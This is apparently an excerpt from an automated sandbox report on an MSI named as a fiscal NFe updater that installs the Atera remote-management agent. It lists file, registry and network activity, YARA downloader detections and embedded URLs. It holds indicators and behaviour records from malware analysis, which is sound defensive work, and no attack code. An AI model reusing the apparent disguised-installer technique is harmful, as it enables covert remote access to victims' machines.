Source:	Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Json\4.0.1.0\System.Runtime.Serialization.Json.pdb source: System.Runtime.Serialization.Json.dll.24.dr
Source:	Binary string: ?CnC:\Windows\Installer\MSIF48E.tmp-\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003D.00000002.2635872282.0000000000947000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2792659060.0000019F9BE37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb! source: rundll32.exe, 0000003D.00000003.2635091236.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638518809.0000000003100000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2635687238.00000000030FF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netstandard1.1\System.Memory.pdbSHA256 source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100727000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\s\AgentPackageTicketing\AgentPackageTicketing\obj\Release\AgentPackageTicketing.pdb source: AgentPackageTicketing.exe, 00000031.00000000.2473112434.0000021F24C42000.00000002.00000001.01000000.0000002A.sdmp

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\cscript.exe	File opened: c:
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	File opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-CheckSumValid.ps1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	File opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Format-FileSize.ps1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	File opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariableNames.ps1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	File opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariable.ps1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	File opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyUnzip.ps1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	File opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyWebFile.ps1

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 4x nop then jmp 00007FFD9B631FFFh	12_2_00007FFD9B631FAC
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 4x nop then jmp 00007FFD9B631873h	12_2_00007FFD9B63172D
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 4x nop then jmp 00007FFD9B614ECBh	14_2_00007FFD9B614E6B
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 4x nop then jmp 00007FFD9B624ECBh	24_2_00007FFD9B624E5C
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 4x nop then dec eax	24_2_00007FFD9B831F53
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 4x nop then jmp 00007FFD9B8356F9h	24_2_00007FFD9B835648

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 40.119.152.241 443

Yara detected Generic Downloader

Source: Yara match	File source: 49.2.AgentPackageTicketing.exe.21f24fc0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.AgentPackageAgentInformation.exe.28a55180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.AgentPackageProgramManagement.exe.11ccbde0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dll, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll, type: DROPPED

Source: AteraAgent.exe, 00000018.00000002.2666352179.00000251008DB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100222000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENT.PACKAGE.AVAILABILITY/0.16/AGENT.PACKAGE.AVAILABILITY.Z
Source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100222000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENT.PACKAGE.WATCHDOG/1.9/AGENT.PACKAGE.WATCHDOG.ZIP
Source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100222000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEADREMOTE/6.0/AGENTPACKAGEADREMOTE.ZIP
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A500167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEAGENTINFORMATION/38.3/AGENTPACKAGEAGENTINFORMATI
Source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100136000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEINTERNALPOLLER/23.8/AGENTPACKAGEINTERNALPOLLER.Z
Source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100222000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEMARKETPLACE/1.6/AGENTPACKAGEMARKETPLACE.ZIP
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEMONITORING/37.8/AGENTPACKAGEMONITORING.ZIP
Source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100136000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEOSUPDATES/20.9/AGENTPACKAGEOSUPDATES.ZIP
Source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100222000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGERUNTIMEINSTALLER/1.6/AGENTPACKAGERUNTIMEINSTALLE
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGESTREMOTE/24.3/AGENTPACKAGESTREMOTE.ZIP
Source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100222000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGESYSTEMTOOLS/27.10/AGENTPACKAGESYSTEMTOOLS.ZIP
Source: AgentPackageSTRemote.exe, 00000021.00000002.2945403740.00000230001A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a6dc35606b2c6816e.awsglobalaccelerator.com
Source: AteraAgent.exe, 0000000C.00000000.1788379355.0000021679142000.00000002.00000001.01000000.0000000F.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500001000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://acontrol.atera.com/
Source: rundll32.exe, 00000004.00000002.1766749834.0000000004BA5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003CA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003AB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5002C4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.1912831829.0000000004A65000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.2037499219.0000028A55DD9000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF4DE000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF467000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF3CD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2211260331.000002478057C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C280583000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14AD99000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256803EE000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000033.00000002.2655425408.000002568050B000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638576747.0000000004985000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://agent-api.atera.com
Source: AgentPackageTicketing.exe, 00000031.00000002.2962491449.0000021F25A01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.nuget.org
Source: rundll32.exe, 00000004.00000002.1766749834.0000000004BA5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003AB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5002C4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.1912831829.0000000004A65000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.2037499219.0000028A55DD9000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF4DE000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF467000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF3CD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2211260331.000002478057C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C280583000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14AD99000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256803EE000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000033.00000002.2655425408.000002568050B000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638576747.0000000004985000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://atera-agent-api-eu.westeurope.cloudapp.azure.com
Source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2794634831.0000019F9BFFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://blob.ams08prdstr06a.store.core.windows.net
Source: AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/
Source: AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/Digi
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3080346987.0000011CCC064000.00000002.00000001.01000000.00000044.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp, Atualizador_Fiscal_NFe_37882912.msi	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5006AA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2385596719.000001A570E25000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723FC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723BF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A5727E0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A57239F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2748747455.0000025179586000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AB00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2761360886.000002517A7B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3080346987.0000011CCC064000.00000002.00000001.01000000.00000044.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp, Atualizador_Fiscal_NFe_37882912.msi	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrus
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003AB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5007A7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A57236D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5002C4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100796000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251008DB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251006DF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251006C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
Source: AteraAgent.exe, 0000000C.00000002.1844841948.00000216000C9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1847212366.000002167ADF0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1848517334.000002167B90B000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5006AA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723FC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2393257978.000001A571F41000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2400417114.000001A5724D3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A5727E0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A57232D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251006C9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AB85000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100727000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
